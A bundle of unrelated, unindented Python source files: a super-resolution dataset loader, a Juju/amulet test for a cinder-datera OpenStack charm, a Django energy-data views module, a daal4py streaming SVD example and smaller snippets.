self.paths_GT, self.sizes_GT = util.get_image_paths(self.data_type, opt['dataroot_GT'])
self.paths_Ref, self.sizes_Ref = util.get_image_paths(self.data_type, opt['dataroot_Ref'])
self.paths_SR, self.sizes_SR = util.get_image_paths(self.data_type, opt['dataroot_SR'])
self.paths_LQ_UX4, self.sizes_LQ_UX4 = util.get_image_paths(self.data_type, opt['dataroot_LQ_UX4'])
assert self.paths_GT, 'Error: GT path is empty.'
if self.paths_Ref and self.paths_GT:
assert len(self.paths_Ref) == len(
self.paths_GT
), 'GT and Ref datasets have different number of images - {}, {}.'.format(
len(self.paths_Ref), len(self.paths_GT))
self.random_scale_list = [1]
def _init_lmdb(self):
# https://github.com/chainer/chainermn/issues/129
self.GT_env = lmdb.open(self.opt['dataroot_GT'], readonly=True, lock=False, readahead=False,
meminit=False)
self.LQ_UX4_env = lmdb.open(self.opt['dataroot_LQ_UX4'], readonly=True, lock=False, readahead=False,
meminit=False)
self.Ref_env = lmdb.open(self.opt['dataroot_Ref'], readonly=True, lock=False, readahead=False,
meminit=False)
self.SR_env = lmdb.open(self.opt['dataroot_SR'], readonly=True, lock=False, readahead=False,
meminit=False)
def __getitem__(self, index):
if self.data_type == 'lmdb' and (self.GT_env is None or self.LQ_UX4_env is None):
self._init_lmdb()
GT_path, LQ_UX4_path, Ref_path, SR_path = None, None, None, None
scale = self.opt['scale']
GT_size = self.opt['GT_size']
# get GT image
GT_path = self.paths_GT[index]
resolution = [int(s) for s in self.sizes_GT[index].split('_')
] if self.data_type == 'lmdb' else None
img_GT = util.read_img(self.GT_env, GT_path, resolution)
if self.opt['phase'] != 'train': # modcrop in the validation / test phase
img_GT = util.modcrop(img_GT, scale)
#if self.opt['color']: # change color space if necessary
# img_GT = util.channel_convert(img_GT.shape[2], self.opt['color'], [img_GT])[0]
# get Ref image
Ref_path = self.paths_Ref[index]
resolution = [int(s) for s in self.sizes_Ref[index].split('_')
] if self.data_type == 'lmdb' else None
img_Ref = util.read_img(self.Ref_env, Ref_path, resolution)
if self.opt['Ref_color']: # change color space if necessary
img_Ref = util.channel_convert(img_Ref.shape[2], self.opt['Ref_color'], [img_Ref])[0]
SR_path = self.paths_SR[index]
resolution = [int(s) for s in self.sizes_SR[index].split('_')
] if self.data_type == 'lmdb' else None
img_SR = util.read_img(self.SR_env, SR_path, resolution)
# get LQ_UX4 image
if self.paths_LQ_UX4:
LQ_UX4_path = self.paths_LQ_UX4[index]
resolution = [int(s) for s in self.sizes_LQ_UX4[index].split('_')
] if self.data_type == 'lmdb' else None
img_LQ_UX4 = util.read_img(self.LQ_UX4_env, LQ_UX4_path, resolution)
if self.opt['phase'] == 'train':
H, W, C = img_LQ_UX4.shape
LQ_size = GT_size
# randomly crop
rnd_h = random.randint(0, max(0, H - LQ_size))
rnd_w = random.randint(0, max(0, W - LQ_size))
img_LQ_UX4 = img_LQ_UX4[rnd_h:rnd_h + LQ_size, rnd_w:rnd_w + LQ_size, :]
img_Ref = img_Ref[rnd_h:rnd_h + LQ_size, rnd_w:rnd_w + LQ_size, :]
img_SR = img_SR[rnd_h:rnd_h + LQ_size, rnd_w:rnd_w + LQ_size, :]
img_GT = img_GT[rnd_h:rnd_h + LQ_size, rnd_w:rnd_w + LQ_size, :]
# augmentation - flip, rotate
img_LQ_UX4, img_Ref, img_SR, img_GT = util.augment([img_LQ_UX4, img_Ref, img_SR, img_GT], self.opt['use_flip'],
self.opt['use_rot'])
# BGR to RGB, HWC to CHW, numpy to tensor
if img_GT.shape[2] == 3:
img_GT = img_GT[:, :, [2, 1, 0]]
img_LQ_UX4 = img_LQ_UX4[:, :, [2, 1, 0]]
img_SR = img_SR[:, :, [2, 1, 0]]
if img_Ref.shape[2] == 3:
img_Ref = img_Ref[:, :, [2, 1, 0]]
img_GT = torch.from_numpy(np.ascontiguousarray(np.transpose(img_GT, (2, 0, 1)))).float()
img_LQ_UX4 = torch.from_numpy(np.ascontiguousarray(np.transpose(img_LQ_UX4, (2, 0, 1)))).float()
img_SR = torch.from_numpy(np.ascontiguousarray(np.transpose(img_SR, (2, 0, 1)))).float()
img_Ref = torch.from_numpy(np.ascontiguousarray(np.transpose(img_Ref, (2, 0, 1)))).float()
return {'LQ_UX4': img_LQ_UX4,'Ref': img_Ref, 'SR': img_SR, 'GT': img_GT, 'LQ_UX4_path': LQ_UX4_path, 'Ref_path': Ref_path, 'SR_path': SR_path, 'GT_path': GT_path}
def __len__(self):
return len(self.paths_GT)
|
#!/usr/bin/env python3
'''
# ppe-cli.py
# interactive search of playerprofiler
'''
import logging
import click
from nfl.ppe import PlayerProfilerExplorer
@click.command()
@click.option('-h', '--path', type=str, default='/tmp',
help='Save path')
@click.option('-f', '--file_name', type=str,
help='Path for pp lookup json file')
@click.option('-c', '--cache_name', type=str, default='pgf-cli',
help='Name for cache')
def run(path, file_name, cache_name):
logger = logging.getLogger(__name__)
hdlr = logging.FileHandler(f"{path}/tgf.log")
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.ERROR)
ppe = PlayerProfilerExplorer(file_name, cache_name=cache_name)
ppe.cmdloop()
if __name__ == '__main__':
run()
|
# Copyright 2014-2015 Canonical Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Basic cinder-datera functional test.
"""
import json
import amulet
from charmhelpers.contrib.openstack.amulet.deployment import (
OpenStackAmuletDeployment
)
from charmhelpers.contrib.openstack.amulet.utils import (
OpenStackAmuletUtils,
DEBUG,
)
ARCHIVE_URL = ('https://github.com/Datera/cinder-driver/archive/'
'v2018.11.14.0.tar.gz')
# Use DEBUG to turn on debug logging
u = OpenStackAmuletUtils(DEBUG)
class CinderDateraBasicDeployment(OpenStackAmuletDeployment):
"""Amulet tests on a basic heat deployment."""
def __init__(self, series=None, openstack=None, source=None, stable=False,
install_type="github"):
"""Deploy the entire test environment."""
super(CinderDateraBasicDeployment, self).__init__(series, openstack,
source, stable)
self._add_services()
self._add_relations()
self._configure_services(install_type)
self._deploy()
u.log.info('Waiting on extended status checks...')
exclude_services = ['nrpe']
# Wait for deployment ready msgs, except exclusions
self._auto_wait_for_status(exclude_services=exclude_services)
self.d.sentry.wait()
self._initialize_tests()
def _add_services(self):
"""Add the services that we're testing, where cinder-datera is
local, and the rest of the services are from lp branches that
are compatible with the local charm (e.g. stable or next).
"""
# Note: cinder-datera becomes a cinder subordinate unit.
this_service = {'name': 'cinder-datera'}
other_services = [
{'name': 'percona-cluster'},
{'name': 'keystone'},
{'name': 'rabbitmq-server'},
{'name': 'cinder'}
]
super(CinderDateraBasicDeployment, self)._add_services(
this_service, other_services, no_origin=['cinder-datera'])
def _add_relations(self):
"""Add all of the relations for the services."""
relations = {
'cinder:storage-backend': 'cinder-datera:storage-backend',
'keystone:shared-db': 'percona-cluster:shared-db',
'cinder:shared-db': 'percona-cluster:shared-db',
'cinder:identity-service': 'keystone:identity-service',
'cinder:amqp': 'rabbitmq-server:amqp',
}
super(CinderDateraBasicDeployment, self)._add_relations(relations)
def _configure_services(self, install_type):
"""Configure all of the services."""
keystone_config = {
'admin-password': 'openstack',
'admin-token': 'ubuntutesting'
}
pxc_config = {
'innodb-buffer-pool-size': '256M',
'max-connections': 1000,
}
cinder_config = {
'block-device': 'None',
'glance-api-version': '2'
}
cinder_datera_config = {
'san_ip': '172.19.1.222',
'san_login': 'admin',
'san_password': 'password',
'install_type': install_type
}
if install_type == 'archive-url':
cinder_datera_config['install_url'] = ARCHIVE_URL
configs = {
'keystone': keystone_config,
'percona-cluster': pxc_config,
'cinder': cinder_config,
'cinder-datera': cinder_datera_config
}
super(CinderDateraBasicDeployment,
self)._configure_services(configs)
def _initialize_tests(self):
"""Perform final initialization before tests get run."""
# Access the sentries for inspecting service units
self.pxc_sentry = self.d.sentry['percona-cluster'][0]
self.keystone_sentry = self.d.sentry['keystone'][0]
self.rabbitmq_sentry = self.d.sentry['rabbitmq-server'][0]
self.cinder_sentry = self.d.sentry['cinder'][0]
self.cinder_datera_sentry = self.d.sentry['cinder-datera'][0]
u.log.debug('openstack release val: {}'.format(
self._get_openstack_release()))
u.log.debug('openstack release str: {}'.format(
self._get_openstack_release_string()))
# Authenticate admin with keystone
self.keystone_session, self.keystone = u.get_default_keystone_session(
self.keystone_sentry,
openstack_release=self._get_openstack_release())
# Authenticate admin with cinder endpoint
if self._get_openstack_release() >= self.xenial_pike:
api_version = 2
else:
api_version = 1
# Authenticate admin with keystone
self.keystone = u.authenticate_keystone_admin(self.keystone_sentry,
user='admin',
password='openstack',
tenant='admin')
# Authenticate admin with cinder endpoint
self.cinder = u.authenticate_cinder_admin(self.keystone, api_version)
def test_102_services(self):
"""Verify the expected services are running on the service units."""
if self._get_openstack_release() >= self.xenial_ocata:
cinder_services = ['apache2',
'cinder-scheduler',
'cinder-volume']
else:
cinder_services = ['cinder-api',
'cinder-scheduler',
'cinder-volume']
services = {
self.cinder_sentry: cinder_services,
}
ret = u.validate_services_by_name(services)
if ret:
amulet.raise_status(amulet.FAIL, msg=ret)
def test_110_users(self):
"""Verify expected users."""
u.log.debug('Checking keystone users...')
expected = [
{'name': 'cinder_cinderv2',
'enabled': True,
'tenantId': u.not_null,
'id': u.not_null,
'email': 'juju@localhost'},
{'name': 'admin',
'enabled': True,
'tenantId': u.not_null,
'id': u.not_null,
'email': 'juju@localhost'}
]
if self._get_openstack_release() > self.xenial_ocata:
expected[0]['name'] = 'cinderv2_cinderv3'
actual = self.keystone.users.list()
ret = u.validate_user_data(expected, actual)
if ret:
amulet.raise_status(amulet.FAIL, msg=ret)
def test_112_service_catalog(self):
"""Verify that the service catalog endpoint data"""
u.log.debug('Checking keystone service catalog...')
u.log.debug('Checking keystone service catalog...')
endpoint_vol = {'adminURL': u.valid_url,
'region': 'RegionOne',
'publicURL': u.valid_url,
'internalURL': u.valid_url}
endpoint_id = {'adminURL': u.valid_url,
'region': 'RegionOne',
'publicURL': u.valid_url,
'internalURL': u.valid_url}
if self._get_openstack_release() >= self.trusty_icehouse:
endpoint_vol['id'] = u.not_null
endpoint_id['id'] = u.not_null
if self._get_openstack_release() >= self.xenial_pike:
# Pike and later
expected = {'identity': [endpoint_id],
'volumev2': [endpoint_id]}
else:
# Ocata and prior
expected = {'identity': [endpoint_id],
'volume': [endpoint_id]}
actual = self.keystone.service_catalog.get_endpoints()
ret = u.validate_svc_catalog_endpoint_data(
expected,
actual,
openstack_release=self._get_openstack_release())
if ret:
amulet.raise_status(amulet.FAIL, msg=ret)
def test_114_cinder_endpoint(self):
"""Verify the cinder endpoint data."""
u.log.debug('Checking cinder endpoint...')
endpoints = self.keystone.endpoints.list()
admin_port = internal_port = public_port = '8776'
if self._get_openstack_release() >= self.xenial_queens:
expected = {
'id': u.not_null,
'region': 'RegionOne',
'region_id': 'RegionOne',
'url': u.valid_url,
'interface': u.not_null,
'service_id': u.not_null}
ret = u.validate_v3_endpoint_data(
endpoints,
admin_port,
internal_port,
public_port,
expected,
6)
else:
expected = {
'id': u.not_null,
'region': 'RegionOne',
'adminurl': u.valid_url,
'internalurl': u.valid_url,
'publicurl': u.valid_url,
'service_id': u.not_null}
ret = u.validate_v2_endpoint_data(
endpoints,
admin_port,
internal_port,
public_port,
expected)
if ret:
amulet.raise_status(amulet.FAIL,
msg='cinder endpoint: {}'.format(ret))
def test_202_cinderdatera_cinder_backend_relation(self):
u.log.debug('Checking cinder-datera:storage-backend to '
'cinder:storage-backend relation data...')
unit = self.cinder_datera_sentry
relation = ['storage-backend', 'cinder:storage-backend']
sub = {"cinder":
{"/etc/cinder/cinder.conf":
{"sections":
{"cinder-datera": [
["san_ip", "172.19.1.222"],
["san_login", "admin"],
["san_password", "password"],
["volume_backend_name", "cinder-datera"],
["volume_driver",
"cinder.volume.drivers.datera."
"datera_iscsi.DateraDriver"],
["use_multipath_for_image_xfer", "true"],
]}}}}
expected = {
'subordinate_configuration': json.dumps(sub),
'private-address': u.valid_ip,
'backend_name': 'cinder-datera',
'egress-subnets': u.not_null,
'ingress-address': u.valid_ip,
}
ret = u.validate_relation_data(unit, relation, expected)
if ret:
msg = u.relation_error(
'cinder cinder-datera storage-backend', ret)
amulet.raise_status(amulet.FAIL, msg=msg)
def test_203_cinder_cinderdatera_backend_relation(self):
u.log.debug('Checking cinder:storage-backend to '
'cinder-datera:storage-backend relation data...')
unit = self.cinder_sentry
relation = ['storage-backend', 'cinder-datera:storage-backend']
expected = {
'private-address': u.valid_ip,
}
ret = u.validate_relation_data(unit, relation, expected)
if ret:
msg = u.relation_error(
'cinder cinder-datera storage-backend', ret)
amulet.raise_status(amulet.FAIL, msg=msg)
def test_204_mysql_cinder_db_relation(self):
"""Verify the mysql:glance shared-db relation data"""
u.log.debug('Checking mysql:cinder db relation data...')
unit = self.pxc_sentry
relation = ['shared-db', 'cinder:shared-db']
expected = {
'private-address': u.valid_ip,
'db_host': u.valid_ip
}
ret = u.validate_relation_data(unit, relation, expected)
if ret:
msg = u.relation_error('mysql shared-db', ret)
amulet.raise_status(amulet.FAIL, msg=msg)
def test_205_cinder_mysql_db_relation(self):
"""Verify the cinder:mysql shared-db relation data"""
u.log.debug('Checking cinder:mysql db relation data...')
unit = self.cinder_sentry
relation = ['shared-db', 'percona-cluster:shared-db']
expected = {
'private-address': u.valid_ip,
'hostname': u.valid_ip,
'username': 'cinder',
'database': 'cinder'
}
ret = u.validate_relation_data(unit, relation, expected)
if ret:
msg = u.relation_error('cinder shared-db', ret)
amulet.raise_status(amulet.FAIL, msg=msg)
def test_206_keystone_cinder_id_relation(self):
"""Verify the keystone:cinder identity-service relation data"""
u.log.debug('Checking keystone:cinder id relation data...')
unit = self.keystone_sentry
relation = ['identity-service',
'cinder:identity-service']
expected = {
'service_protocol': 'http',
'service_tenant': 'services',
'admin_token': 'ubuntutesting',
'service_password': u.not_null,
'service_port': '5000',
'auth_port': '35357',
'auth_protocol': 'http',
'private-address': u.valid_ip,
'auth_host': u.valid_ip,
'service_tenant_id': u.not_null,
'service_host': u.valid_ip
}
if self._get_openstack_release() < self.xenial_pike:
# Ocata and earlier
expected['service_username'] = 'cinder_cinderv2'
else:
# Pike and later
expected['service_username'] = 'cinderv2_cinderv3'
ret = u.validate_relation_data(unit, relation, expected)
if ret:
msg = u.relation_error('identity-service cinder', ret)
amulet.raise_status(amulet.FAIL, msg=msg)
def test_207_cinder_keystone_id_relation(self):
"""Verify the cinder:keystone identity-service relation data"""
u.log.debug('Checking cinder:keystone id relation data...')
unit = self.cinder_sentry
relation = ['identity-service',
'keystone:identity-service']
expected = {
'private-address': u.valid_ip
}
ret = u.validate_relation_data(unit, relation, expected)
if ret:
msg = u.relation_error('cinder identity-service', ret)
amulet.raise_status(amulet.FAIL, msg=msg)
def test_208_rabbitmq_cinder_amqp_relation(self):
"""Verify the rabbitmq-server:cinder amqp relation data"""
u.log.debug('Checking rmq:cinder amqp relation data...')
unit = self.rabbitmq_sentry
relation = ['amqp', 'cinder:amqp']
expected = {
'private-address': u.valid_ip,
'password': u.not_null,
'hostname': u.valid_ip
}
ret = u.validate_relation_data(unit, relation, expected)
if ret:
msg = u.relation_error('amqp cinder', ret)
amulet.raise_status(amulet.FAIL, msg=msg)
def test_209_cinder_rabbitmq_amqp_relation(self):
"""Verify the cinder:rabbitmq-server amqp relation data"""
u.log.debug('Checking cinder:rmq amqp relation data...')
unit = self.cinder_sentry
relation = ['amqp', 'rabbitmq-server:amqp']
expected = {
'private-address': u.valid_ip,
'vhost': 'openstack',
'username': u.not_null
}
ret = u.validate_relation_data(unit, relation, expected)
if ret:
msg = u.relation_error('cinder amqp', ret)
amulet.raise_status(amulet.FAIL, msg=msg)
def test_300_cinder_config(self):
"""Verify the data in the cinder.conf file."""
u.log.debug('Checking cinder config file data...')
unit = self.cinder_sentry
conf = '/etc/cinder/cinder.conf'
unit_mq = self.rabbitmq_sentry
rel_mq_ci = unit_mq.relation('amqp', 'cinder:amqp')
dat_backend = 'cinder-datera'
expected = {
'DEFAULT': {
'debug': 'False',
'verbose': 'False',
'auth_strategy': 'keystone',
'enabled_backends': dat_backend
},
dat_backend: {
'san_ip': '172.19.1.222',
'san_login': 'admin',
'san_password': 'password',
'volume_backend_name': dat_backend,
'volume_driver': (
'cinder.volume.drivers.datera.datera_iscsi.DateraDriver')
}
}
expected_rmq = {
'rabbit_userid': 'cinder',
'rabbit_virtual_host': 'openstack',
'rabbit_password': rel_mq_ci['password'],
'rabbit_host': rel_mq_ci['hostname'],
}
if self._get_openstack_release() >= self.trusty_kilo:
# Kilo or later
expected['oslo_messaging_rabbit'] = expected_rmq
else:
# Juno or earlier
expected['DEFAULT'].update(expected_rmq)
for section, pairs in expected.iteritems():
ret = u.validate_config_data(unit, conf, section, pairs)
if ret:
message = "cinder config error: {}".format(ret)
amulet.raise_status(amulet.FAIL, msg=message)
def test_400_cinder_api_connection(self):
"""Simple api call to check service is up and responding"""
u.log.debug('Checking basic cinder api functionality...')
check = list(self.cinder.volumes.list())
u.log.debug('Cinder api check (volumes.list): {}'.format(check))
assert(check == [])
def test_402_create_delete_volume(self):
"""Create a cinder volume and delete it."""
u.log.debug('Creating, checking and deleting cinder volume...')
vol_new = u.create_cinder_volume(self.cinder)
vol_id = vol_new.id
u.delete_resource(self.cinder.volumes, vol_id, msg="cinder volume")
|
"""Template exceptions."""
class MalformedTemplate(Exception):
"""Malformed template."""
def __init__(self, cause):
"""Init."""
message = f"Malformed template: {cause}"
super(MalformedTemplate, self).__init__(message)
class MissingTemplate(Exception):
"""Missing template."""
def __init__(self, path):
"""Init."""
message = f"Missing template: {path}"
super(MissingTemplate, self).__init__(message)
|
from django.shortcuts import render_to_response
from django.shortcuts import render
from .models import *
from django.http import HttpResponse
import json
from datetime import datetime
from datetime import date, timedelta
from datetime import time
from django.http import HttpResponseRedirect
import cgi
from isoweek import Week
def get_week_days(year, week):
d = date(year,1,1)
if(d.weekday()>3):
d = d+timedelta(7-d.weekday())
else:
d = d - timedelta(d.weekday())
dlt = timedelta(days = (week-1)*7)
return d + dlt, d + dlt + timedelta(days=6)
def home(request):
return render_to_response('myapp/home.html')
def main(request):
test1 = list(StreetLighting1.objects.all())
return render(request,'myapp/main.html', {'test':test1})
def data_main(request):
json_list=[]
data=StreetLighting1.objects.all()[4:7]
for item in data:
json_item = {'type': "street_lighting1",
'dimos': item.municipality,
'kwdikos': item.code,
'latitude': item.latitude,
'longitude': item.longitude,
}
print(item.latitude)
json_list.append(json_item)
data=Building.objects.all()
for item in data:
json_item = {'type': "building",
'dimos': item.municipality,
'kwdikos': item.building_code,
'latitude': item.latitude,
'longitude': item.longitude,
}
print(item.latitude)
json_list.append(json_item)
data=StreetLighting.objects.all()
for item in data:
json_item = {'type': "street_lighting",
'dimos': item.municipality,
'kwdikos': item.line_code,
'latitude': item.latitude,
'longitude': item.longitude,
}
print(item.latitude)
json_list.append(json_item)
data=ElectricVehicle.objects.all()
for item in data:
json_item = {'type': "EV",
'dimos': item.municipality,
'kwdikos': item.chargingpoint_code,
'latitude': item.latitude,
'longitude': item.longitude,
}
print(item.latitude)
json_list.append(json_item)
return HttpResponse(json.dumps(json_list), content_type='application/json')
def buildings(request):
all_buildings = list(Building.objects.all())
return render(request, 'myapp/buildings.html', {'all_buildings': all_buildings},)
def data_buildings(request):
ids = request.GET['state']
indicator = request.GET['state2']
time_scope = request.GET['state3']
from_date = request.GET['state4']
to_date = request.GET['state5']
from_date1=datetime.strptime(from_date,"%Y-%m-%d").date()
to_date1=datetime.strptime(to_date,"%Y-%m-%d").date()
# seperate graph-button-ids
if ids=="":
json_list=[]
else:
button_list = ids.split("_")
list_of_ids = []
for b in button_list:
# hold only the ids
list_of_ids.append(int(b.split('graph-button-')[1]))
print ("list of ids=", list_of_ids)
json_list=[]
for id in list_of_ids:
data1 = Building.objects.get(id=id)
if indicator == "kwh" or indicator == "kwh_m2":
list = data1.kwh.all()
elif indicator == "lt" or indicator == "lt_m2":
list = data1.lt.all()
elif indicator == "kw":
list = data1.kw.all()
elif indicator == "co2_tn" or indicator == "co2_tn_m2":
list = data1.co2_tn.all()
elif indicator == "co2_lt" or indicator == "co2_lt_m2":
list = data1.co2_lt.all()
for item2 in list:
if item2.timestamp.strftime('%Y-%m-%d') >= from_date1.strftime('%Y-%m-%d') and item2.timestamp.strftime('%Y-%m-%d') <= to_date1.strftime('%Y-%m-%d'):
if time_scope=="month":
timestamp=item2.timestamp.strftime('%b')
elif time_scope=="week":
timestamp=(Week(int(item2.timestamp.strftime('%Y')),int(item2.timestamp.strftime('%W'))).monday()).strftime('%d-%m-%Y')+" - "+(Week(int(item2.timestamp.strftime('%Y')),int(item2.timestamp.strftime('%W'))).sunday()).strftime('%d-%m-%Y')
elif time_scope=="day":
timestamp=item2.timestamp.strftime('%d-%b')
else:
timestamp=item2.timestamp.strftime('%d-%b %H:%M:%S')
if indicator == "kwh" or indicator == "lt" or indicator == "kw" or indicator == "co2_tn" or indicator == "co2_lt":
metric=format(float(item2.metric),'.3f')
else:
metric=format(float(item2.metric)/data1.surface,'.3f')
json_item = {'municipality': data1.municipality,
'code': data1.building_code,
'metric': metric,
'timestamp': timestamp}
json_list.append(json_item)
return HttpResponse(json.dumps(json_list), content_type='application/json')
def street_lighting(request):
all_street_lighting = list(StreetLighting.objects.all())
return render_to_response('myapp/street_lighting.html', {'all_street_lighting': all_street_lighting},)
def data_street_lighting(request):
ids = request.GET['state']
indicator = request.GET['state2']
time_scope = request.GET['state3']
from_date = request.GET['state4']
to_date = request.GET['state5']
from_date1=datetime.strptime(from_date,"%Y-%m-%d").date()
to_date1=datetime.strptime(to_date,"%Y-%m-%d").date()
# seperate graph-button-ids
if ids=="":
json_list=[]
else:
button_list = ids.split("_")
list_of_ids = []
for b in button_list:
# hold only the ids
list_of_ids.append(int(b.split('graph-button-')[1]))
print ("list of ids=", list_of_ids)
json_list=[]
for id in list_of_ids:
data1 = StreetLighting.objects.get(id=id)
if indicator == "kwh" or indicator == "kwh_line_length" or indicator == "kwh_light":
list = data1.kwh.all()
elif indicator == "kw":
list = data1.kw.all()
elif indicator == "co2_tn" or indicator == "co2_tn_line_length":
list = data1.co2_tn.all()
for item2 in list:
if item2.timestamp.strftime('%Y-%m-%d') >= from_date1.strftime('%Y-%m-%d') and item2.timestamp.strftime('%Y-%m-%d') <= to_date1.strftime('%Y-%m-%d'):
if time_scope=="month":
timestamp=item2.timestamp.strftime('%b')
elif time_scope=="week":
timestamp=(Week(int(item2.timestamp.strftime('%Y')),int(item2.timestamp.strftime('%W'))).monday()).strftime('%d-%m-%Y')+" - "+(Week(int(item2.timestamp.strftime('%Y')),int(item2.timestamp.strftime('%W'))).sunday()).strftime('%d-%m-%Y')
elif time_scope=="day":
timestamp=item2.timestamp.strftime('%d-%b')
else:
timestamp=item2.timestamp.strftime('%d-%b %H:%M:%S')
if indicator == "kwh" or indicator == "kw" or indicator == "co2_tn":
metric=format(float(item2.metric),'.3f')
elif indicator == "kwh_light":
metric=format(float(item2.metric)/data1.lights_number,'.3f')
else:
metric=format(float(item2.metric)/data1.line_length,'.3f')
json_item = {'municipality': data1.municipality,
'code': data1.line_code,
'metric': metric,
'timestamp': timestamp}
json_list.append(json_item)
return HttpResponse(json.dumps(json_list), content_type='application/json')
def EVs(request):
all_EVs = list(ElectricVehicle.objects.all())
return render_to_response('myapp/EVs.html', {'all_EVs': all_EVs},)
def data_EVs(request):
ids = request.GET['state']
indicator = request.GET['state2']
time_scope = request.GET['state3']
from_date = request.GET['state4']
to_date = request.GET['state5']
from_date1=datetime.strptime(from_date,"%Y-%m-%d").date()
to_date1=datetime.strptime(to_date,"%Y-%m-%d").date()
# seperate graph-button-ids
if ids=="":
json_list=[]
else:
button_list = ids.split("_")
list_of_ids = []
for b in button_list:
# hold only the ids
list_of_ids.append(int(b.split('graph-button-')[1]))
print ("list of ids=", list_of_ids)
json_list=[]
for id in list_of_ids:
data1 = ElectricVehicle.objects.get(id=id)
if indicator == "kwh":
list = data1.kwh.all()
elif indicator == "total_charging_points":
list = data1.total_charging_points.all()
elif indicator == "available_charging_points":
list = data1.available_charging_points.all()
elif indicator == "co2_tn":
list = data1.co2_tn.all()
for item2 in list:
if item2.timestamp.strftime('%Y-%m-%d') >= from_date1.strftime('%Y-%m-%d') and item2.timestamp.strftime('%Y-%m-%d') <= to_date1.strftime('%Y-%m-%d'):
if time_scope=="month":
timestamp=item2.timestamp.strftime('%b')
elif time_scope=="week":
timestamp=(Week(int(item2.timestamp.strftime('%Y')),int(item2.timestamp.strftime('%W'))).monday()).strftime('%d-%m-%Y')+" - "+(Week(int(item2.timestamp.strftime('%Y')),int(item2.timestamp.strftime('%W'))).sunday()).strftime('%d-%m-%Y')
elif time_scope=="day":
timestamp=item2.timestamp.strftime('%d-%b')
else:
timestamp=item2.timestamp.strftime('%d-%b %H:%M:%S')
if indicator == "kwh" or indicator == "co2_tn":
metric=format(float(item2.metric),'.3f')
else:
metric=item2.metric
json_item = {'municipality': data1.municipality,
'code': data1.chargingpoint_code,
'metric': metric,
'timestamp': timestamp}
json_list.append(json_item)
return HttpResponse(json.dumps(json_list), content_type='application/json')
#def test2(request):
# return render_to_response('myapp/test2.html')
def mydata(request):
test1 = list(StreetLighting1.objects.all())
return render(request, 'myapp/mydata.html', {'test1': test1},)
def data_test(request):
ids = request.GET['state']
indicator = request.GET['state2']
time_scope = request.GET['state3']
from_date = request.GET['state4']
to_date = request.GET['state5']
#print (from_date)
#print (to_date)
from_date1=datetime.strptime(from_date,"%Y-%m-%d").date()
to_date1=datetime.strptime(to_date,"%Y-%m-%d").date()
print (from_date1)
print (to_date1)
# seperate graph-button-ids
if ids=="":
json_list=[]
else:
button_list = ids.split("_")
list_of_ids = []
for b in button_list:
# hold only the ids
list_of_ids.append(int(b.split('graph-button-')[1]))
print ("list of ids=", list_of_ids)
json_list=[]
if indicator=="kw":
for id in list_of_ids:
data1=StreetLighting1.objects.get(id=id)
kw = data1.kw.all()
for item2 in kw:
print ("item2=", item2.timestamp.strftime('%Y-%m-%d'))
#print (item2.timestamp.strftime('%W'))
print (Week(int(item2.timestamp.strftime('%Y')),int(item2.timestamp.strftime('%W'))).monday())
if item2.timestamp.strftime('%Y-%m-%d') >= from_date1.strftime('%Y-%m-%d') and item2.timestamp.strftime('%Y-%m-%d') <= to_date1.strftime('%Y-%m-%d'):
#print(item2.timestamp.month)
#print(datetime.now().month)
if time_scope=="month":
json_item = {'dimos': data1.municipality,
'kwdikos': data1.code,
'metric': item2.metric,
'timestamp': item2.timestamp.strftime('%b')}
print(item2.metric)
json_list.append(json_item)
elif time_scope=="week":
json_item = {'dimos': data1.municipality,
'kwdikos': data1.code,
'metric': item2.metric,
# 'timestamp': item2.timestamp.strftime('%A')
'timestamp': (Week(int(item2.timestamp.strftime('%Y')),int(item2.timestamp.strftime('%W'))).monday()).strftime('%d-%m-%Y')+" - "+(Week(int(item2.timestamp.strftime('%Y')),int(item2.timestamp.strftime('%W'))).sunday()).strftime('%d-%m-%Y')}
print(item2.metric)
json_list.append(json_item)
elif time_scope=="day":
json_item = {'dimos': data1.municipality,
'kwdikos': data1.code,
'metric': item2.metric,
'timestamp': item2.timestamp.strftime('%d-%b')}
print(item2.metric)
json_list.append(json_item)
else:
json_item = {'dimos': data1.municipality,
'kwdikos': data1.code,
'metric': item2.metric,
'timestamp': item2.timestamp.strftime('%d-%b %H:%M:%S')}
print(item2.metric)
json_list.append(json_item)
elif indicator=="kwh":
for id in list_of_ids:
data1=StreetLighting1.objects.get(id=id)
kwh = data1.kwh.all()
for item2 in kwh:
json_item = {'dimos': data1.municipality,
'kwdikos': data1.code,
'metric': item2.metric,
'timestamp': item2.timestamp.strftime('%d-%b-%Y %H:%M:%S')}
print(item2.metric)
json_list.append(json_item)
return HttpResponse(json.dumps(json_list), content_type='application/json') |
#*******************************************************************************
# Copyright 2014-2018 Intel Corporation
# All Rights Reserved.
#
# This software is licensed under the Apache License, Version 2.0 (the
# "License"), the following terms apply:
#
# You may not use this file except in compliance with the License. You may
# obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#*******************************************************************************
# Example showing daal4py's operation on streams using a generator
import daal4py as d4p
import numpy as np
import os
# a generator which reads a file in chunks
def read_next(file, chunksize):
assert os.path.isfile(file)
s = 0
while True:
# if found a smaller chunk we set s to < 0 to indicate eof
if s < 0:
return
a = np.genfromtxt(file, delimiter=',', skip_header=s, max_rows=chunksize)
if a.shape[0] == 0:
return
if a.ndim == 1:
a = a[:, np.newaxis]
# last chunk is usually smaller, if not, numpy will print warning in next iteration
if chunksize > a.shape[0]:
s = -1
else:
s += a.shape[0]
yield a
# get the generator
rn = read_next("./data/batch/svd.csv", 112)
# creat an SVD algo object
algo = d4p.svd(streaming=True)
# iterate through chunks/stream
for chunk in rn:
algo.compute(chunk)
# finalize computation
res = algo.finalize()
print("Singular values:\n", res.singularValues)
|
# -*- coding: utf-8 -*-
# python-holidays
# ---------------
# A fast, efficient Python library for generating country, province and state
# specific sets of holidays on the fly. It aims to make determining whether a
# specific date is a holiday as fast and flexible as possible.
#
